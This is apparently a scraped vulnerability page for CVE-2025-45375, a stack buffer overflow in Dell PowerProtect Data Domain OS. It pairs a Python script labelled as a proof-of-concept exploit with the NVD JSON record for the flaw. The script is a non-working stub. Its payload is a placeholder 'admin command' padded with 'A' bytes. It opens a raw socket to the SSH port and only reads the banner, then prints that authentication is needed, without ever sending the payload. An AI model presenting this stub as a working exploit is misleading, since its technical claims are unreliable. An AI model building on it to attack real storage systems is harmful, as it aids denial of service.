CVE-2025-45375

# CVE-2025-45375 - Dell PowerProtect Data Domain Stack-based Buffer Overflow PoC # Vulnerability: Stack-based Buffer Overflow in DD OS # Affected: Feature Release 7.7.1.0 - 8.3.0.15, LTS2025 8.3.1.0, # LTS2024 7.13.1.0 - 7.13.1.30, LTS2023 7.10.1.0 - 7.10.1.60 # Requirements: Local access + High privilege (admin) account # Impact: Denial of Service (DoS) import socket import struct import sys TARGET_HOST = "192.168.1.100" # Data Domain management IP TARGET_PORT = 22 # SSH port for DD OS CLI access BUFFER_SIZE = 4096 # Construct overflow payload # The vulnerable function in DD OS fails to validate input length # when processing certain administrative commands def craft_payload(): """ Craft a stack-based buffer overflow payload. The payload overflows a stack buffer by providing an excessively long argument to a privileged command. """ # Normal command buffer size is typically 256-1024 bytes # Overflow by providing input much larger than buffer size overflow_size = 8192 # Significantly larger than expected buffer junk = b"A" * overflow_size # Build the malicious command # The specific vulnerable command interface varies by DD OS version payload = b"admin command " + junk + b"\n" return payload def exploit(): """ Exploit the stack-based buffer overflow vulnerability. Requires authenticated local or SSH session with admin privileges. """ print(f"[*] Targeting {TARGET_HOST}:{TARGET_PORT}") print("[*] CVE-2025-45375 - DD OS Stack Buffer Overflow") payload = craft_payload() print(f"[*] Payload size: {len(payload)} bytes") try: # Connect via SSH (requires valid admin credentials) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((TARGET_HOST, TARGET_PORT)) # Receive SSH banner banner = sock.recv(BUFFER_SIZE) print(f"[*] SSH Banner: {banner.strip().decode()}") # Note: Full exploitation requires authenticated SSH session # After authentication, the overflow payload is sent via # the privileged CLI interface print("[!] Authentication required (admin credentials)") print("[!] After auth, send crafted payload via privileged CLI command") print("[!] This will trigger stack overflow -> DoS") sock.close() except Exception as e: print(f"[-] Connection failed: {e}") sys.exit(1) if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-45375", "sourceIdentifier": "[email protected]", "published": "2025-10-07T19:15:38.400", "lastModified": "2025-10-14T20:08:25.173", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.3.0.15, LTS2025 release version 8.3.1.0, LTS2024 release versions 7.13.1.0 through 7.13.1.30, LTS 2023 release versions 7.10.1.0 through 7.10.1.60, contain a Stack-based Buffer Overflow vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.70", "matchCriteriaId": "7FCE50EA-F2B8-4455-A489-1947B0CBFEEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndExcluding": "7.13.1.40", "matchCriteriaId": "C0EA46C5-6776-411A-8FBC-5B32BC216888"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.0.0", "versionEndIncluding": "8.3.0.15", "matchCriteriaId": "F1DB489A-E2CF-4477-A08B-101B569A714E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.1.0", "versionEndExcluding": "8.3.1.10", "matchCriteriaId": "9E0743E3-14E7-4FF9-88C5-E038D62F2344"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000376224/dsa-2025-333-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}